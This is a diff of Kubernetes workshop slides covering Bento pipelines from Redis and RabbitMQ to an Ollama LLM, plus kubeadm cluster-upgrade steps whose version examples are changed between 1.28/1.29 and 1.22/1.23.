redis-cli -h redis LLEN cities
|
||||
```
|
||||
(There should be 47.)
|
||||
|
||||
---
|
||||
|
||||
## 2️⃣ Consume the queue over HTTP
|
||||
|
||||
- We want to "get the next city" in the queue with a simple `curl`
|
||||
|
||||
- Our input will be `redis_list`
|
||||
|
||||
- Our output will be `http_server`
|
||||
|
||||
---
|
||||
|
||||
## Generate the Bento configuration
|
||||
|
||||
Option 1: `bento create redis_list//http_server`
|
||||
|
||||
Option 2: [read the docs][output-http-server]
|
||||
|
||||
---
|
||||
|
||||
## 🙋 Choose your own adventure
|
||||
|
||||
Do you want to try to write that configuration?
|
||||
|
||||
Or shall we see it right away?
|
||||
|
||||
--
|
||||
|
||||
⚠️ Spoilers on next slide!
|
||||
|
||||
---
|
||||
|
||||
## `redis2http.yaml`
|
||||
|
||||
```yaml
|
||||
input:
|
||||
redis_list:
|
||||
url: redis://redis:`6379`
|
||||
key: cities
|
||||
output:
|
||||
http_server:
|
||||
path: /nextcity
|
||||
```
|
||||
|
||||
This will set up an HTTP route to fetch *one* city.
|
||||
|
||||
It's also possible to batch, stream...
|
||||
|
||||
⚠️ As of November 2024, `bento create` uses port 6397 instead of 6379 for Redis!
|
||||
|
||||
---
|
||||
|
||||
## Trying it out
|
||||
|
||||
- Run Bento with this configuration:
|
||||
```bash
|
||||
bento --config redis2http.yaml &
|
||||
```
|
||||
|
||||
- Retrieve one city:
|
||||
```bash
|
||||
curl http://localhost:4195/nextcity
|
||||
```
|
||||
|
||||
- Check what happens after we retrive *all* the cities!
|
||||
|
||||
---
|
||||
|
||||
## 3️⃣ Query our LLM for each city
|
||||
|
||||
- We want to ask our LLM who's the mayor of each of these cities
|
||||
|
||||
- We'll use a prompt that will usually ensure a short answer
|
||||
|
||||
(so that it's faster; we don't want to wait 30 seconds per city!)
|
||||
|
||||
- We'll test the prompt with the Ollama CLI
|
||||
|
||||
- Then we'll craft a proper HTTP API query
|
||||
|
||||
- Finally, we'll configure an [enrichment workflow][enrichment] in Bento
|
||||
|
||||
---
|
||||
|
||||
## Test our prompt
|
||||
|
||||
Assuming that our earlier Ollama Deployment is still running:
|
||||
|
||||
```bash
|
||||
kubectl exec deployment/ollama -- \
|
||||
ollama run qwen2:1.5b "
|
||||
Who is the mayor of San Francisco?
|
||||
Just give the name by itself on a single line.
|
||||
If you don't know, don't say anything.
|
||||
"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Turn the prompt into an HTTP API query
|
||||
|
||||
Note: to install `http` in an Alpine container, run `apk add httpie`.
|
||||
|
||||
```bash
|
||||
http http://ollama.default:11434/api/generate \
|
||||
model=qwen2:1.5b stream:=false prompt="
|
||||
Who is the mayor of Paris?
|
||||
Just give the name by itself on a single line.
|
||||
If you don't know, don't say anything.
|
||||
"
|
||||
```
|
||||
|
||||
We get a JSON payload, and we want to use the `response` field.
|
||||
|
||||
---
|
||||
|
||||
## Configure an enrichment workflow
|
||||
|
||||
The [Bento documentation][enrichment] is really good!
|
||||
|
||||
We need to set up:
|
||||
|
||||
- a `branch` processor
|
||||
|
||||
- a `request_map` to transform the city into an Ollama request
|
||||
|
||||
- an `http` processor to submit the request to Ollama
|
||||
|
||||
- a `result_map` to transform the Ollama response
|
||||
|
||||
---
|
||||
|
||||
## Without the `branch` processor
|
||||
|
||||
<pre class="mermaid">
|
||||
flowchart LR
|
||||
|
||||
CITY["
|
||||
city: Paris
|
||||
country: France
|
||||
population: 1106000
|
||||
iso2: FR
|
||||
...
|
||||
"]
|
||||
|
||||
REQ["
|
||||
model: qwen2:1.5b
|
||||
stream: false
|
||||
prompt: Who is the mayor of Paris?
|
||||
"]
|
||||
|
||||
REP["
|
||||
response: Anne Hidalgo
|
||||
eval_count: ...
|
||||
prompt_eval_count: ...
|
||||
(other ollama fields)
|
||||
"]
|
||||
|
||||
CITY@{ shape: card}
|
||||
REQ@{ shape: card}
|
||||
REP@{ shape: card}
|
||||
|
||||
style CITY text-align: left
|
||||
style REQ text-align: left
|
||||
style REP text-align: left
|
||||
|
||||
mapping@{ shape: diam }
|
||||
http["http processor"]@{ shape: diam }
|
||||
|
||||
CITY --> mapping --> REQ --> http --> REP
|
||||
</pre>
|
||||
|
||||
- We transform the `city` into an Ollama request
|
||||
|
||||
- The `http` processor submits the request to Ollama
|
||||
|
||||
- The final output is the Ollama response
|
||||
|
||||
---
|
||||
|
||||
## With the `branch` processor
|
||||
|
||||
<pre class="mermaid">
|
||||
flowchart LR
|
||||
|
||||
CITY["
|
||||
city: Paris
|
||||
country: France
|
||||
population: 1106000
|
||||
iso2: FR
|
||||
...
|
||||
"]
|
||||
|
||||
REQ["
|
||||
model: qwen2:1.5b
|
||||
stream: false
|
||||
prompt: Who is the mayor of Paris?
|
||||
"]
|
||||
|
||||
REP["
|
||||
response: Anne Hidalgo
|
||||
eval_count: ...
|
||||
prompt_eval_count: ...
|
||||
(other ollama fields)
|
||||
"]
|
||||
|
||||
OUT["
|
||||
city: Paris
|
||||
country: France
|
||||
population: 1106000
|
||||
iso2: FR
|
||||
...
|
||||
mayor: Anne Hidalgo
|
||||
"]
|
||||
|
||||
CITY@{ shape: card}
|
||||
REQ@{ shape: card}
|
||||
REP@{ shape: card}
|
||||
OUT@{ shape: card}
|
||||
|
||||
style CITY text-align: left
|
||||
style REQ text-align: left
|
||||
style REP text-align: left
|
||||
style OUT text-align: left
|
||||
|
||||
branch@{ shape: diam }
|
||||
request_map@{ shape: diam }
|
||||
result_map@{ shape: diam }
|
||||
http["http processor"]@{ shape: diam }
|
||||
|
||||
CITY --> branch
|
||||
branch --> result_map
|
||||
branch --> request_map
|
||||
request_map --> REQ
|
||||
REQ --> http
|
||||
http --> REP
|
||||
REP --> result_map
|
||||
result_map --> OUT
|
||||
</pre>
|
||||
|
||||
- The `branch` processor allows doing the processing "on the side"
|
||||
|
||||
- `request_map` and `result_map` transform the message before/after processing
|
||||
|
||||
- Then, the result is combined with the original message (the `city`)
|
||||
|
||||
---
|
||||
|
||||
```yaml
|
||||
input:
|
||||
csv:
|
||||
paths: ["cities.csv"]
|
||||
pipeline:
|
||||
processors:
|
||||
- branch:
|
||||
request_map: |
|
||||
root.model = "qwen2:1.5b"
|
||||
root.stream = false
|
||||
root.prompt = (
|
||||
"Who is the mayor of %s? ".format(this.city) +
|
||||
"Just give the name by itself on a single line. " +
|
||||
"If you don't know, don't say anything."
|
||||
)
|
||||
processors:
|
||||
- http:
|
||||
url: http://ollama:11434/api/generate
|
||||
verb: POST
|
||||
result_map: |
|
||||
root.mayor = this.response
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Trying it out
|
||||
|
||||
- Save the YAML on the previous page into a configuration file
|
||||
|
||||
- Run Bento with that configuration file
|
||||
|
||||
- What happens?
|
||||
|
||||
--
|
||||
|
||||
🤔 We're seeing errors due to timeouts
|
||||
|
||||
```
|
||||
ERRO HTTP request to 'http://ollama...' failed: http://ollama...:
|
||||
Post "http://ollama...": context deadline exceeded
|
||||
(Client.Timeout exceeded while awaiting headers)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 🙋 Choose your own adventure
|
||||
|
||||
How should we address errors?
|
||||
|
||||
- Option 1: increase the timeout in the [http][bento-http] processor
|
||||
|
||||
- Option 2: use a [retry][bento-retry] processor in the pipeline
|
||||
|
||||
- Option 3: use a [reject_errored][bento-reject] output
|
||||
|
||||
---
|
||||
|
||||
## 🏗️ Let's build something!
|
||||
|
||||
- We want to process 1000 cities with our LLM
|
||||
|
||||
(guessing who the mayor is, or something similar)
|
||||
|
||||
- Store the output wherever we want
|
||||
|
||||
(Redis, CSV file, JSONL files...)
|
||||
|
||||
- Deal correctly with errors
|
||||
|
||||
(we'll check that there are, indeed, 1000 cities in the output)
|
||||
|
||||
- Scale out to process faster
|
||||
|
||||
(scale ollama to e.g. 10 replicas, enable parallelism in Bento)
|
||||
|
||||
---
|
||||
|
||||
class: title
|
||||
|
||||
🍱 Lunch time! 🍱
|
||||
|
||||
---
|
||||
|
||||
## What happened?
|
||||
|
||||
- If your Ollama pods have *resource requests*:
|
||||
|
||||
→ your cluster may have auto-scaled
|
||||
|
||||
- If your Ollama pods don't have *resource requests*:
|
||||
|
||||
→ you probably have a bunch of container restarts, due to out-of-memory errors
|
||||
|
||||
🤔 What's that about?
|
||||
|
||||
[bento-http]: https://warpstreamlabs.github.io/bento/docs/components/processors/http/
|
||||
[bento-inputs]: https://warpstreamlabs.github.io/bento/docs/components/inputs/about/
|
||||
[bento-reject]: https://warpstreamlabs.github.io/bento/docs/components/outputs/reject_errored
|
||||
[bento-retry]: https://warpstreamlabs.github.io/bento/docs/components/processors/retry
|
||||
[bento-switch]: https://warpstreamlabs.github.io/bento/docs/components/processors/switch/
|
||||
[enrichment]: https://warpstreamlabs.github.io/bento/cookbooks/enrichments/
|
||||
[output-http-server]: https://warpstreamlabs.github.io/bento/docs/components/outputs/http_server
|
||||
[redpanda-acquires-benthos]: https://www.redpanda.com/press/redpanda-acquires-benthos
|
||||
[warpstream-forks-benthos]: https://www.warpstream.com/blog/announcing-bento-the-open-source-fork-of-the-project-formerly-known-as-benthos
|
||||
|
||||
@@ -1,250 +0,0 @@
|
||||
# Bento & RabbitMQ
|
||||
|
||||
- In some of the previous runs, messages were dropped
|
||||
|
||||
(we start with 1000 messages in `cities` and have e.g. 955 in `mayors`)
|
||||
|
||||
- This is caused by various errors during processing
|
||||
|
||||
(e.g. too many timeouts; Bento being shutdown halfway through...)
|
||||
|
||||
- ...And by the fact that we are using a Redis queue
|
||||
|
||||
(which doesn't offer delivery guarantees or acknowledgements)
|
||||
|
||||
- Can we get something better?
|
||||
|
||||
---
|
||||
|
||||
## The problem
|
||||
|
||||
- Some inputs (like `redis_list`) don't support *acknowledgements*
|
||||
|
||||
- When a message is pulled from the queue, it is deleted immediately
|
||||
|
||||
- If the message is lost for any reason, it is lost permanently
|
||||
|
||||
---
|
||||
|
||||
## The solution
|
||||
|
||||
- Some inputs (like `amqp_0_9`) support acknowledgements
|
||||
|
||||
- When a message is pulled from the queue:
|
||||
|
||||
- it is not visible anymore to other consumers
|
||||
|
||||
- it needs to be explicitly acknowledged
|
||||
|
||||
- The acknowledgement is done by Bento when the message reaches the output
|
||||
|
||||
- The acknowledgement deletes the message
|
||||
|
||||
- No acknowledgement after a while? Consumer crashes/disconnects?
|
||||
|
||||
Message gets requeued automatically!
|
||||
|
||||
---
|
||||
|
||||
## `amqp_0_9`
|
||||
|
||||
- Protocol used by RabbitMQ
|
||||
|
||||
- Very simplified behavior:
|
||||
|
||||
- messages are published to an [*exchange*][amqp-exchanges]
|
||||
|
||||
- messages have a *routing key*
|
||||
|
||||
- the exchange routes the message to one (or zero or more) queues
|
||||
</br>(possibly using the routing key or message headers to decide which queue(s))
|
||||
|
||||
- [*consumers*][amqp-consumers] subscribe to queues to receive messages
|
||||
|
||||
[amqp-exchanges]: https://www.rabbitmq.com/tutorials/amqp-concepts#exchanges
|
||||
[amqp-consumers]: https://www.rabbitmq.com/tutorials/amqp-concepts#consumers
|
||||
|
||||
---
|
||||
|
||||
## Using the default exchange
|
||||
|
||||
- There is a default exchange (called `""` - empty string)
|
||||
|
||||
- The routing key indicates the name of the queue to deliver to
|
||||
|
||||
- The queue needs to exist (we need to create it beforehand)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Defining custom exchanges
|
||||
|
||||
- Create an exchange
|
||||
|
||||
- exchange types: direct, fanout, topic, headers
|
||||
|
||||
- durability: persisted to disk to survive server restart or not?
|
||||
|
||||
- Create a binding
|
||||
|
||||
- which exchange?
|
||||
|
||||
- which routing key? (for direct exchanges)
|
||||
|
||||
- which queue?
|
||||
|
||||
---
|
||||
|
||||
## RabbitMQ on Kubernetes
|
||||
|
||||
- RabbitMQ can be deployed on Kubernetes:
|
||||
|
||||
- directly (creating e.g. a StatefulSet)
|
||||
|
||||
- with the RabbitMQ operator
|
||||
|
||||
- We're going to do the latter!
|
||||
|
||||
- The operator includes the "topology operator"
|
||||
|
||||
(to configure queues, exchanges, and bindings through custom resources)
|
||||
|
||||
---
|
||||
|
||||
## Installing the RabbitMQ operator
|
||||
|
||||
- Let's install it with this Helm chart:
|
||||
|
||||
```bash
|
||||
helm upgrade --install --repo https://charts.bitnami.com/bitnami \
|
||||
--namespace rabbitmq-system --create-namespace \
|
||||
rabbitmq-cluster-operator rabbitmq-cluster-operator
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Deploying a simple RabbitMQ cluster
|
||||
|
||||
- Let's use the YAML manifests in that directory:
|
||||
|
||||
https://github.com/jpetazzo/beyond-load-balancers/tree/main/rabbitmq
|
||||
|
||||
- This creates:
|
||||
|
||||
- a `RabbitmqCluster` called `mq`
|
||||
|
||||
- a `Secret` called `mq-default-user` containing access credentials
|
||||
|
||||
- a durable `Queue` named `q1`
|
||||
|
||||
(We can ignore the `Exchange` and the `Binding`, we won't use them.)
|
||||
|
||||
---
|
||||
|
||||
## 🏗️ Let's build something!
|
||||
|
||||
Let's replace the `cities` Redis list with our RabbitMQ queue.
|
||||
|
||||
(See next slide for steps and hints!)
|
||||
|
||||
---
|
||||
|
||||
## Steps
|
||||
|
||||
1. Edit the Bento configuration for our "CSV importer".
|
||||
|
||||
(replace the `redis_list` output with `amqp_0_9`)
|
||||
|
||||
2. Run that pipeline and confirm that messages show up in RabbitMQ.
|
||||
|
||||
3. Edit the Bento configuration for the Ollama consumer.
|
||||
|
||||
(replace the `redis_list` input with `amqp_0_9`)
|
||||
|
||||
4. Trigger a scale up of the Ollama consumer.
|
||||
|
||||
5. Update the KEDA Scaler to use RabbitMQ instead of Redis.
|
||||
|
||||
---
|
||||
|
||||
## 1️⃣ Sending messages to RabbitMQ
|
||||
|
||||
- Edit our Bento configuration (the one feeding the CSV file to Redis)
|
||||
|
||||
- We want the following `output` section:
|
||||
```yaml
|
||||
output:
|
||||
amqp_0_9:
|
||||
exchange: ""
|
||||
key: q1
|
||||
mandatory: true
|
||||
urls:
|
||||
- "${AMQP_URL}"
|
||||
```
|
||||
|
||||
- Then export the AMQP_URL environment variable using `connection_string` from Secret `mq-default-user`
|
||||
|
||||
💡 Yes, we can directly use environment variables in Bento configuration!
|
||||
|
||||
---
|
||||
|
||||
## 2️⃣ Testing our AMQP output
|
||||
|
||||
- Run the Bento pipeline
|
||||
|
||||
- To check that our messages made it:
|
||||
```bash
|
||||
kubectl exec mq-server-0 -- rabbitmqctl list_queues
|
||||
```
|
||||
|
||||
- We can also use Prometheus metrics, e.g. `rabbitmq_queue_messages`
|
||||
|
||||
---
|
||||
|
||||
## 3️⃣ Receiving messages from RabbitMQ
|
||||
|
||||
- Edit our other Bento configuration (the one in the Ollama consumer Pod)
|
||||
|
||||
- We want the following `input` section:
|
||||
```yaml
|
||||
input:
|
||||
amqp_0_9:
|
||||
urls:
|
||||
- `amqp://...:5672/`
|
||||
queue: q1
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4️⃣ Triggering Ollama scale up
|
||||
|
||||
- If the autoscaler is configured to scale to zero, disable it
|
||||
|
||||
(easiest solution: delete the ScaledObject)
|
||||
|
||||
- Then manually scale the Deployment to e.g. 4 Pods
|
||||
|
||||
- Check that messages are processed and show up in the output
|
||||
|
||||
(it should still be a Redis list at this point)
|
||||
|
||||
---
|
||||
|
||||
## 5️⃣ Autoscaling on RabbitMQ
|
||||
|
||||
- We need to update our ScaledObject
|
||||
|
||||
- Check the [RabbitMQ Queue Scaler][keda-rabbitmq]
|
||||
|
||||
- Multiple ways to pass the AMQP URL:
|
||||
|
||||
- hardcode it (easier solution for testing!)
|
||||
|
||||
- use `...fromEnv` and set environment variables in target pod
|
||||
|
||||
- create and use a TriggerAuthentication
|
||||
|
||||
💡 Since we have the AMQP URL in a Secret, TriggerAuthentication works great!
|
||||
|
||||
[keda-rabbitmq]: https://keda.sh/docs/latest/scalers/rabbitmq-queue/
|
||||
@@ -55,7 +55,6 @@
|
||||
|
||||
`cert-manager.io/allow-direct-injection: "true"`
|
||||
|
||||
- See [cert-manager documentation] for details
|
||||
|
||||
[cert-manager documentation]: https://cert-manager.io/docs/concepts/ca-injector/
|
||||
- See [cert-manager documentation][docs] for details
|
||||
|
||||
[docs]: https://cert-manager.io/docs/concepts/ca-injector/
|
||||
|
||||
@@ -272,9 +272,9 @@ This can be overridden by setting the annotation:
|
||||
|
||||
- Can express `minAvailable` or `maxUnavailable`
|
||||
|
||||
- See [documentation][doc-pdb] for details and examples
|
||||
- See [documentation] for details and examples
|
||||
|
||||
[doc-pdb]: https://kubernetes.io/docs/tasks/run-application/configure-pdb/
|
||||
[documentation]: https://kubernetes.io/docs/tasks/run-application/configure-pdb/
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -81,7 +81,7 @@
|
||||
|
||||
## What version are we running anyway?
|
||||
|
||||
- When I say, "I'm running Kubernetes 1.28", is that the version of:
|
||||
- When I say, "I'm running Kubernetes 1.22", is that the version of:
|
||||
|
||||
- kubectl
|
||||
|
||||
@@ -111,73 +111,6 @@
|
||||
|
||||
---
|
||||
|
||||
## Important questions
|
||||
|
||||
- Should we upgrade the control plane before or after the kubelets?
|
||||
|
||||
- Within the control plane, should we upgrade the API server first or last?
|
||||
|
||||
- How often should we upgrade?
|
||||
|
||||
- How long are versions maintained?
|
||||
|
||||
- All the answers are in [the documentation about version skew policy](https://kubernetes.io/docs/setup/release/version-skew-policy/)!
|
||||
|
||||
- Let's review the key elements together ...
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes uses semantic versioning
|
||||
|
||||
- Kubernetes versions look like MAJOR.MINOR.PATCH; e.g. in 1.28.9:
|
||||
|
||||
- MAJOR = 1
|
||||
- MINOR = 28
|
||||
- PATCH = 9
|
||||
|
||||
- It's always possible to mix and match different PATCH releases
|
||||
|
||||
(e.g. 1.28.9 and 1.28.13 are compatible)
|
||||
|
||||
- It is recommended to run the latest PATCH release
|
||||
|
||||
(but it's mandatory only when there is a security advisory)
|
||||
|
||||
---
|
||||
|
||||
## Version skew
|
||||
|
||||
- API server must be more recent than its clients (kubelet and control plane)
|
||||
|
||||
- ... Which means it must always be upgraded first
|
||||
|
||||
- All components support a difference of one¹ MINOR version
|
||||
|
||||
- This allows live upgrades (since we can mix e.g. 1.28 and 1.29)
|
||||
|
||||
- It also means that going from 1.28 to 1.30 requires going through 1.29
|
||||
|
||||
.footnote[¹Except kubelet, which can be up to two MINOR behind API server,
|
||||
and kubectl, which can be one MINOR ahead or behind API server.]
|
||||
|
||||
---
|
||||
|
||||
## Release cycle
|
||||
|
||||
- There is a new PATCH relese whenever necessary
|
||||
|
||||
(every few weeks, or "ASAP" when there is a security vulnerability)
|
||||
|
||||
- There is a new MINOR release every 3 months (approximately)
|
||||
|
||||
- At any given time, three MINOR releases are maintained
|
||||
|
||||
- ... Which means that MINOR releases are maintained approximately 9 months
|
||||
|
||||
- We should expect to upgrade at least every 3 months (on average)
|
||||
|
||||
---
|
||||
|
||||
## General guidelines
|
||||
|
||||
- To update a component, use whatever was used to install it
|
||||
@@ -206,6 +139,73 @@ and kubectl, which can be one MINOR ahead or behind API server.]
|
||||
|
||||
---
|
||||
|
||||
## Important questions
|
||||
|
||||
- Should we upgrade the control plane before or after the kubelets?
|
||||
|
||||
- Within the control plane, should we upgrade the API server first or last?
|
||||
|
||||
- How often should we upgrade?
|
||||
|
||||
- How long are versions maintained?
|
||||
|
||||
- All the answers are in [the documentation about version skew policy](https://kubernetes.io/docs/setup/release/version-skew-policy/)!
|
||||
|
||||
- Let's review the key elements together ...
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes uses semantic versioning
|
||||
|
||||
- Kubernetes versions look like MAJOR.MINOR.PATCH; e.g. in 1.22.17:
|
||||
|
||||
- MAJOR = 1
|
||||
- MINOR = 22
|
||||
- PATCH = 17
|
||||
|
||||
- It's always possible to mix and match different PATCH releases
|
||||
|
||||
(e.g. 1.22.17 and 1.22.5 are compatible)
|
||||
|
||||
- It is recommended to run the latest PATCH release
|
||||
|
||||
(but it's mandatory only when there is a security advisory)
|
||||
|
||||
---
|
||||
|
||||
## Version skew
|
||||
|
||||
- API server must be more recent than its clients (kubelet and control plane)
|
||||
|
||||
- ... Which means it must always be upgraded first
|
||||
|
||||
- All components support a difference of one¹ MINOR version
|
||||
|
||||
- This allows live upgrades (since we can mix e.g. 1.22 and 1.23)
|
||||
|
||||
- It also means that going from 1.22 to 1.24 requires going through 1.23
|
||||
|
||||
.footnote[¹Except kubelet, which can be up to two MINOR behind API server,
|
||||
and kubectl, which can be one MINOR ahead or behind API server.]
|
||||
|
||||
---
|
||||
|
||||
## Release cycle
|
||||
|
||||
- There is a new PATCH relese whenever necessary
|
||||
|
||||
(every few weeks, or "ASAP" when there is a security vulnerability)
|
||||
|
||||
- There is a new MINOR release every 3 months (approximately)
|
||||
|
||||
- At any given time, three MINOR releases are maintained
|
||||
|
||||
- ... Which means that MINOR releases are maintained approximately 9 months
|
||||
|
||||
- We should expect to upgrade at least every 3 months (on average)
|
||||
|
||||
---
|
||||
|
||||
## In practice
|
||||
|
||||
- We are going to update a few cluster components
|
||||
@@ -254,7 +254,7 @@ and kubectl, which can be one MINOR ahead or behind API server.]
|
||||
sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml
|
||||
```
|
||||
|
||||
- Look for the `image:` line, and update it to e.g. `v1.30.1`
|
||||
- Look for the `image:` line, and update it to e.g. `v1.24.1`
|
||||
|
||||
]
|
||||
|
||||
@@ -320,29 +320,53 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
- First things first: we need to upgrade kubeadm
|
||||
|
||||
- The Kubernetes package repositories are now split by minor versions
|
||||
.lab[
|
||||
|
||||
(i.e. there is one repository for 1.28, another for 1.29, etc.)
|
||||
- Upgrade kubeadm:
|
||||
```
|
||||
sudo apt install kubeadm=1.27.0-00
|
||||
```
|
||||
|
||||
- This avoids accidentally upgrading from one minor version to another
|
||||
- Check what kubeadm tells us:
|
||||
```
|
||||
sudo kubeadm upgrade plan
|
||||
```
|
||||
|
||||
(e.g. with unattended upgrades or if packages haven't been held/pinned)
|
||||
]
|
||||
|
||||
- We'll need to add the new package repository and unpin packages!
|
||||
Problem: kubeadm doesn't know know how to handle
|
||||
upgrades from version 1.22.
|
||||
|
||||
This is because we installed version 1.27.
|
||||
|
||||
We need to install kubeadm version 1.23.X.
|
||||
|
||||
---
|
||||
|
||||
## Installing the new packages
|
||||
## Downgrading kubeadm
|
||||
|
||||
- Edit `/etc/apt/sources.list.d/kubernetes.list`
|
||||
- We need to go back to kubeadm version 1.23.X.
|
||||
|
||||
(or copy it to e.g. `kubernetes-1.29.list` and edit that)
|
||||
.lab[
|
||||
|
||||
- `apt-get update`
|
||||
- View available versions for package `kubeadm`:
|
||||
```bash
|
||||
apt show kubeadm -a | grep ^Version | grep 1.23
|
||||
```
|
||||
|
||||
- Now edit (or remove) `/etc/apt/preferences.d/kubernetes`
|
||||
- Downgrade kubeadm:
|
||||
```
|
||||
sudo apt install kubeadm=1.23.0-00
|
||||
```
|
||||
|
||||
- `apt-get install kubeadm` should now upgrade `kubeadm` correctly! 🎉
|
||||
- Check what kubeadm tells us:
|
||||
```
|
||||
sudo kubeadm upgrade plan
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
kubeadm should now agree to upgrade to 1.23.X.
|
||||
|
||||
---
|
||||
|
||||
@@ -361,7 +385,7 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
- Look for the `image:` line, and restore it to the original value
|
||||
|
||||
(e.g. `v1.28.9`)
|
||||
(e.g. `v1.22.17`)
|
||||
|
||||
- Wait for the control plane to come back up
|
||||
|
||||
@@ -375,14 +399,9 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
.lab[
|
||||
|
||||
- Check the upgrade plan:
|
||||
```bash
|
||||
sudo kubeadm upgrade plan
|
||||
```
|
||||
|
||||
- Perform the upgrade:
|
||||
```bash
|
||||
sudo kubeadm upgrade apply v1.29.0
|
||||
sudo kubeadm upgrade apply v1.23.0
|
||||
```
|
||||
|
||||
]
|
||||
@@ -399,9 +418,15 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
- Log into node `oldversion2`
|
||||
|
||||
- Update package lists and APT pins like we did before
|
||||
- View available versions for package `kubelet`:
|
||||
```bash
|
||||
apt show kubelet -a | grep ^Version
|
||||
```
|
||||
|
||||
- Then upgrade kubelet
|
||||
- Upgrade kubelet:
|
||||
```bash
|
||||
sudo apt install kubelet=1.23.0-00
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
@@ -454,16 +479,13 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
.lab[
|
||||
|
||||
- Execute the whole upgrade procedure on each node:
|
||||
- Download the configuration on each node, and upgrade kubelet:
|
||||
```bash
|
||||
for N in 1 2 3; do
|
||||
ssh oldversion$N "
|
||||
sudo sed -i s/1.28/1.29/ /etc/apt/sources.list.d/kubernetes.list &&
|
||||
sudo rm /etc/apt/preferences.d/kubernetes &&
|
||||
sudo apt update &&
|
||||
sudo apt install kubeadm -y &&
|
||||
sudo apt install kubeadm=1.23.0-00 &&
|
||||
sudo kubeadm upgrade node &&
|
||||
sudo apt install kubelet -y"
|
||||
sudo apt install kubelet=1.23.0-00"
|
||||
done
|
||||
```
|
||||
]
|
||||
@@ -472,7 +494,7 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
- All our nodes should now be updated to version 1.29
|
||||
- All our nodes should now be updated to version 1.23.0
|
||||
|
||||
.lab[
|
||||
|
||||
@@ -485,115 +507,17 @@ Note 2: kubeadm itself is still version 1.22.1..
|
||||
|
||||
---
|
||||
|
||||
## And now, was that a good idea?
|
||||
|
||||
--
|
||||
|
||||
**Almost!**
|
||||
|
||||
--
|
||||
|
||||
- The official recommendation is to *drain* a node before performing node maintenance
|
||||
|
||||
(migrate all workloads off the node before upgrading it)
|
||||
|
||||
- How do we do that?
|
||||
|
||||
- Is it really necessary?
|
||||
|
||||
- Let's see!
|
||||
|
||||
---
|
||||
|
||||
## Draining a node
|
||||
|
||||
- This can be achieved with the `kubectl drain` command, which will:
|
||||
|
||||
- *cordon* the node (prevent new pods from being scheduled there)
|
||||
|
||||
- *evict* all the pods running on the node (delete them gracefully)
|
||||
|
||||
- the evicted pods will automatically be recreated somewhere else
|
||||
|
||||
- evictions might be blocked in some cases (Pod Disruption Budgets, `emptyDir` volumes)
|
||||
|
||||
- Once the node is drained, it can safely be upgraded, restarted...
|
||||
|
||||
- Once it's ready, it can be put back in commission with `kubectl uncordon`
|
||||
|
||||
---
|
||||
|
||||
## Is it necessary?
|
||||
|
||||
- When upgrading kubelet from one patch-level version to another:
|
||||
|
||||
- it's *probably fine*
|
||||
|
||||
- When upgrading system packages:
|
||||
|
||||
- it's *probably fine*
|
||||
|
||||
- except [when it's not][datadog-systemd-outage]
|
||||
|
||||
- When upgrading the kernel:
|
||||
|
||||
- it's *probably fine*
|
||||
|
||||
- ...as long as we can tolerate a restart of the containers on the node
|
||||
|
||||
- ...and that they will be unavailable for a few minutes (during the reboot)
|
||||
|
||||
[datadog-systemd-outage]: https://www.datadoghq.com/blog/engineering/2023-03-08-deep-dive-into-platform-level-impact/
|
||||
|
||||
---
|
||||
|
||||
## Is it necessary?
|
||||
|
||||
- When upgrading kubelet from one minor version to another:
|
||||
|
||||
- it *may or may not be fine*
|
||||
|
||||
- in some cases (e.g. migrating from Docker to containerd) it *will not*
|
||||
|
||||
- Here's what [the documentation][node-upgrade-docs] says:
|
||||
|
||||
*Draining nodes before upgrading kubelet ensures that pods are re-admitted and containers are re-created, which may be necessary to resolve some security issues or other important bugs.*
|
||||
|
||||
- Do it at your own risk, and if you do, test extensively in staging environments!
|
||||
|
||||
[node-upgrade-docs]: https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/#manual-deployments
|
||||
|
||||
---
|
||||
|
||||
## Database operators to the rescue
|
||||
|
||||
- Moving stateful pods (e.g.: database server) can cause downtime
|
||||
|
||||
- Database replication can help:
|
||||
|
||||
- if a node contains database servers, we make sure these servers aren't primaries
|
||||
|
||||
- if they are primaries, we execute a *switch over*
|
||||
|
||||
- Some database operators (e.g. [CNPG]) will do that switch over automatically
|
||||
|
||||
(when they detect that a node has been *cordoned*)
|
||||
|
||||
[CNPG]: https://cloudnative-pg.io/
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Skipping versions
|
||||
|
||||
- This example worked because we went from 1.28 to 1.29
|
||||
- This example worked because we went from 1.22 to 1.23
|
||||
|
||||
- If you are upgrading from e.g. 1.26, you will have to go through 1.27 first
|
||||
- If you are upgrading from e.g. 1.21, you will have to go through 1.22 first
|
||||
|
||||
- This means upgrading kubeadm to 1.27.X, then using it to upgrade the cluster
|
||||
- This means upgrading kubeadm to 1.22.X, then using it to upgrade the cluster
|
||||
|
||||
- Then upgrading kubeadm to 1.28.X, etc.
|
||||
- Then upgrading kubeadm to 1.23.X, etc.
|
||||
|
||||
- **Make sure to read the release notes before upgrading!**
|
||||
|
||||
|
||||
@@ -225,4 +225,4 @@ consul agent -data-dir=/consul/data -client=0.0.0.0 -server -ui \
|
||||
:EN:- Scheduling pods together or separately
|
||||
:EN:- Example: deploying a Consul cluster
|
||||
:FR:- Lancer des pods ensemble ou séparément
|
||||
:FR:- Exemple : lancer un cluster Consul
|
||||
:FR:- Example : lancer un cluster Consul
|
||||
|
||||
@@ -24,32 +24,6 @@
|
||||
|
||||
---
|
||||
|
||||
## A bit of history
|
||||
|
||||
Things related to Custom Resource Definitions:
|
||||
|
||||
